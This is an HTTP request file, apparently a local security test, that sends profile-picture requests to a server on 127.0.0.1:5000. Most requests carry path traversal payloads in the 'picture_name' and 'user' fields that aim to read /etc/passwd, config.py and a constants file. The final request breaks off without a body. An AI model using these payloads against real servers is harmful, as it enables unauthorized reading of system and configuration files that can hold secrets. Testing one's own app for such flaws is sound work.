###

POST http://127.0.0.1:5000/profile_picture
Content-Type: application/json

{
    "picture_name": "user001"
}


###

POST http://127.0.0.1:5000/profile_picture
Content-Type: application/json

{
    "picture_name": "../../../../../../../../../etc/passwd"
}

###

POST http://127.0.0.1:5000/profile_picture
Content-Type: application/json

{
    "picture_name": "../../config.py"
}


###

POST http://127.0.0.1:5000/profile_picture
Content-Type: application/json

{
    "picture_name": "../../utilities/constants.py"
}

###

GET http://127.0.0.1:5000/get_picture
Content-Type: application/json

{
    "user": "../../../../../../../../../../../../../../../../../etc/passwd"
}

###

POST 127.0.0.1:5000/profile_picture
Content-Type: multipart/form-data
